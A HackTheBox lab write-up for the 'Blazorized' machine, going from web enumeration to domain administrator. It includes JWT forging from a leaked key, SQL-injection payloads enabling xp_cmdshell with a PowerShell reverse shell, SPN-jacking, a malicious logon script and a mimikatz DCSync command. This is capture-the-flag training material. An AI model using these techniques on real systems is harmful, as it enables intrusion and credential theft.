Hackthebox - Blazorized

HackTheBox
1

0x1 Initial Access

  • Web application on port 80 is built with the Blazor WebAssembly
  • Subdomain Enumeration
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u "http://blazorized.htb" -H "HOST: FUZZ.blazorized.htb" -c -fs 144
  • Found subdomains api.blazorized.htb and admin.blazorized.htb
  • admin.blazorized.htb requires credentials to login
  • For better understanding blazor web apps and structure please refer to official documentation on GITHUB
  • Found endpoints:
    • /_framework/blazor.webassembly.js: Essential for running Blazor apps
    • /_framework/wasm/: Contains WebAssembly binaries
  • Deobfuscating blazor.webassembly.js reveals the path _framework/blazor.boot.json which contains metadata about the application such as DLLs
  • Check for customised DLLs:
{
"Blazored.LocalStorage.dll": "sha256-5V8ovY1srbIIz7lzzMhLd3nNJ9LJ6bHoBOnLJahv8Go=",
"Blazorized.DigitalGarden.dll": "sha256-YH2BGBuuUllYRVTLRSM+TxZtmhmNitErmBqq1Xb1fdI=",
"Blazorized.Shared.dll": "sha256-Bz\/iaIKjbUZ4pzYB1LxrExKonhSlVdPH63LsehtJDqY=",
"Blazorized.Helpers.dll": "sha256-ekLzpGbbVEn95uwSU2BGWpjosCK\/fqqQRjGFUW0jAQQ="
}

0x2 DLL Ananlysis

  • Decompile DLLs using DNSpy
  • Hardcoded secret in Blazorized.Helpers.dll
private static readonly string jwtSymmetricSecurityKey = "869............d0a";  
private static readonly string superAdminEmailClaimValue = "superadmin@blazorized.htb";
private static readonly string postsPermissionsClaimValue = "Posts_Get_All";
private static readonly string categoriesPermissionsClaimValue = "Categories_Get_All";
private static readonly string superAdminRoleClaimValue = "Super_Admin";
private static readonly string issuer = "http://api.blazorized.htb";
private static readonly string apiAudience = "http://api.blazorized.htb";
private static readonly string adminDashboardAudience = "http://admin.blazorized.htb";
  • Forge a JWT for Super Admin on JWT.IO
{
  "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress": "superadmin@blazorized.htb",
  "http://schemas.microsoft.com/ws/2008/06/identity/claims/role": "Super_Admin",
  "iss": "http://api.blazorized.htb",
  "aud": "http://admin.blazorized.htb",
  "exp": <expiration_timestamp>
}
  • Set the jwt token to Local Storage → admin → jwt:
  • Refresh admin.blazorized.htb to get access to admin dashboard

0x3 Admin Dashboard

  • Sql Injection on dashboard
  • Enable xp_cmdshell from Check duplicate posts
www'; EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;-- -
  • Command Execution
www'; exec master..xp_cmdshell 'xxx';-- -
  • Get reverse shell
www'; exec master..xp_cmdshell 'powershell -enc powershell#base64 from revshells.com';-- -
  • Get shell as NU_1055

0x4 NU_1055

  • BloodHound reveals that NU_1055 has writeSPN Privilege on the RSA_4801 account
  • Vulnerable to SPN-jacking
  • Import PowerView
  • Set SPN
Set-DomainObject -Identity RSA_4810 -SET @{serviceprincipalname='kitty/kat'}
  • Request Service Ticket
Get-DomainSPNTicket -SPN kitty/kat
  • Save the hash
  • Crack the hash using hashcat
  • Login to RSA_4810 using evil-winrm

0x5 RSA_4810

  • From Bloodhound we can see that RSA_4810 is member of group Remote_Support_Administrators
  • Run winpeas, we have writeable file path
Folder: C:\windows\tasks
    FolderPerms: Authenticated Users [WriteData/CreateFiles]

Folder: C:\windows\system32\tasks
    FolderPerms: Authenticated Users [WriteData/CreateFiles]
  • We have write privilege under A32FF3AEAA23 directory in SYSVOL which is commonly used for logon scripts and Group Policy Data
  • User SSA_6010 login every minute
  • SSA_6010 also runs a logon script from scriptpath attribute \\dc1\NETLOGON\A32FF3AEAA23\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF\2C0A3DFE2030, indicating that logon scripts are stored in NETLOGON Share
  • Using icacls, it was verified that RSA_4810 has write access to the batch files
  • Create a logon script for SSA_6010 to get a reverse shell
'powershell -e bas64 encoded payload'| Out-File -FilePath C:\windows\SYSVOL\sysvol\blazorized.htb\scripts\A32FF3AEAA23\shell.bat -Encoding ASCII
  • Set the ScriptPath for SSA_6010
Set-ADUser -Identity SSA_6010 -ScriptPath 'A32FF3AEAA23\shell.bat'
  • Get shell as SSA_6010

0x6 SSA_6010

  • Run Bloodhound again and we can see that SSA_6010 is member of Super_Support_Administrators group
  • DCSync Privilege allows us to extract credentials
  • Load mimikatz
lsadump::dcsync /domain:blazorized.htb /user:Administrator
  • Get NTLM Hash

0x7 Administrator

  • Login as Administrator using evil-winrm with extracted NTLM Hash